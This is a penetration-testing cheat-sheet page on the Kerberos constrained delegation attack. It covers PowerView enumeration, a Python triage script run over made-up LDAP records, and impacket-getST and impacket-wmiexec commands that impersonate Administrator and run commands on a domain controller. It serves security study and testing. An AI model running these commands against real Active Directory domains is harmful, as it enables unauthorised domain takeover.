Constrained Delegation Attack
Last modified: 2024-02-18
If a compromised account (user or computer) is configured for Kerberos Constrained Delegation, i.e. its msDS-AllowedToDelegateTo attribute lists one or more SPNs, it can use the S4U2Self and S4U2Proxy extensions to obtain a service ticket for one of those SPNs on behalf of another user, typically a domain administrator. When protocol transition ("Use any authentication protocol", the TrustedToAuthForDelegation flag) is enabled, this works without knowing that user's credentials. The resulting ticket can then be used to authenticate to the listed service, for example to execute commands on the host.
Investigation
Check whether Kerberos Constrained Delegation is enabled for a user
# PowerView: lists accounts whose msDS-AllowedToDelegateTo attribute is set, together with the allowed SPNs.
# Computer accounts are checked with the same -TrustedToAuth switch of Get-NetComputer.
Get-NetUser -TrustedToAuth
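The same triage done offline, as an added example that is not code from the original page or from PowerView: it takes the LDAP attributes the query above returns (userAccountControl, msDS-AllowedToDelegateTo, memberOf) and decides whether the S4U path described in the Exploit section can work, including the checks that the requested SPN is actually in the allowed list and that the user to impersonate is delegable. The account names, SPNs and group DNs are constructed for the example.

```python
# Added example (not from the original page): offline triage of Kerberos
# constrained delegation settings from constructed LDAP records. Account
# names, SPNs and DNs below are made up for the example.
from dataclasses import dataclass, field
from typing import List, Tuple

# userAccountControl bits (MS-ADTS 2.2.16)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # KCD with protocol transition ("use any protocol")
NORMAL_ACCOUNT = 0x200

PROTECTED_USERS_DN_PREFIX = "CN=PROTECTED USERS,"


@dataclass
class Account:
    sam_account_name: str
    user_account_control: int
    allowed_to_delegate_to: List[str] = field(default_factory=list)  # msDS-AllowedToDelegateTo
    member_of: List[str] = field(default_factory=list)               # memberOf (DNs)


def delegation_mode(acct: Account) -> str:
    """Classify the delegation configured on an account."""
    if acct.user_account_control & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if acct.allowed_to_delegate_to:
        if acct.user_account_control & TRUSTED_TO_AUTH_FOR_DELEGATION:
            # S4U2Self returns a forwardable ticket, so any delegable user
            # can be impersonated without knowing their credentials.
            return "constrained (protocol transition)"
        # Kerberos-only KCD: the S4U2Self ticket is not forwardable, so
        # S4U2Proxy needs a forwardable ticket the user really obtained.
        return "constrained (Kerberos only)"
    return "none"


def can_be_impersonated(target: Account) -> bool:
    """S4U2Proxy is refused for sensitive accounts and Protected Users members."""
    if target.user_account_control & NOT_DELEGATED:
        return False
    return not any(dn.upper().startswith(PROTECTED_USERS_DN_PREFIX) for dn in target.member_of)


def _normalise_spn(spn: str) -> str:
    """Lower-case and drop an explicit port so CIFS/DC:445 matches cifs/dc."""
    service, _, host = spn.partition("/")
    return f"{service.lower()}/{host.split(':')[0].lower()}"


def spn_allowed(acct: Account, spn: str) -> bool:
    """The requested SPN must be listed in msDS-AllowedToDelegateTo."""
    wanted = _normalise_spn(spn)
    return any(_normalise_spn(s) == wanted for s in acct.allowed_to_delegate_to)


def plan_s4u(acct: Account, target: Account, spn: str) -> Tuple[bool, str]:
    """Decide whether getST -impersonate <target> -spn <spn> can succeed as acct."""
    mode = delegation_mode(acct)
    if mode == "none":
        return False, f"{acct.sam_account_name} has no delegation configured"
    if mode == "unconstrained":
        return False, f"{acct.sam_account_name} is unconstrained; the KCD path does not apply"
    if not spn_allowed(acct, spn):
        return False, f"{spn} is not in msDS-AllowedToDelegateTo of {acct.sam_account_name}"
    if not can_be_impersonated(target):
        return False, f"{target.sam_account_name} cannot be delegated (sensitive / Protected Users)"
    if mode == "constrained (Kerberos only)":
        return False, "no protocol transition: a forwardable ticket from the target user is needed first"
    return True, f"S4U2Self+S4U2Proxy as {acct.sam_account_name} for {target.sam_account_name} to {spn}"


# Constructed sample records (hypothetical domain example.local)
SVC_WEB = Account("svc_web", NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
                  ["cifs/dc.example.local", "ldap/dc.example.local:389"])
SVC_SQL = Account("svc_sql", NORMAL_ACCOUNT, ["mssqlsvc/sql01.example.local:1433"])
ADMINISTRATOR = Account("Administrator", NORMAL_ACCOUNT)
DA_ADMIN = Account("da_admin", NORMAL_ACCOUNT | NOT_DELEGATED,
                   member_of=["CN=Protected Users,CN=Users,DC=example,DC=local"])

if __name__ == "__main__":
    for acct, target, spn in [
        (SVC_WEB, ADMINISTRATOR, "cifs/dc.example.local"),
        (SVC_WEB, DA_ADMIN, "cifs/dc.example.local"),
        (SVC_WEB, ADMINISTRATOR, "cifs/fs01.example.local"),
        (SVC_SQL, ADMINISTRATOR, "mssqlsvc/sql01.example.local"),
    ]:
        ok, why = plan_s4u(acct, target, spn)
        print(f"[{'+' if ok else '-'}] {delegation_mode(acct):36} {why}")
```

Only the first combination is exploitable as described on this page; the others fail on the delegable-target check, the SPN list, or the missing protocol transition, which are the three things to verify before running getST.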
Exploit
1. Request Service Ticket for Another User
The target SPN must be one of those listed in the compromised account's msDS-AllowedToDelegateTo attribute, and the impersonated user must not be marked "Account is sensitive and cannot be delegated" or be a member of Protected Users. Impersonating a user whose credentials you do not have also requires protocol transition (TrustedToAuthForDelegation) on the compromised account.
# -k: Use Kerberos auth (a TGT from KRB5CCNAME); without it, getST prompts for the password of UserName, or pass -hashes for an NT hash
# -impersonate: the user to obtain the ticket for
# -spn: the target service, which must be in the allowed list
# Note the output file name printed as "Saving ticket in ..."
impacket-getST -k -impersonate Administrator -spn cifs/dc.example.local example.local/UserName
2. Use the Service Ticket
The ticket is saved as a ccache file. Point KRB5CCNAME at it with an absolute path so impacket and other Kerberos clients pick it up:
# Use the file name getST printed in "Saving ticket in ..."; it depends on the impacket version
export KRB5CCNAME=`pwd`/Administrator.ccache
# Check by listing the cached tickets; the service principal should be the SPN requested above.
# If the klist command is not found, install it with `apt install krb5-user`
klist
Login to Services with Kerberos Auth
The target host must be the one named in the ticket's SPN (dc.example.local here), not an IP address or the bare domain name; otherwise the ticket in the ccache is not matched.
# -k: Use Kerberos auth (ticket from KRB5CCNAME)
# -no-pass: Do not prompt for a password
impacket-wmiexec example.local/Administrator@dc.example.local -k -no-pass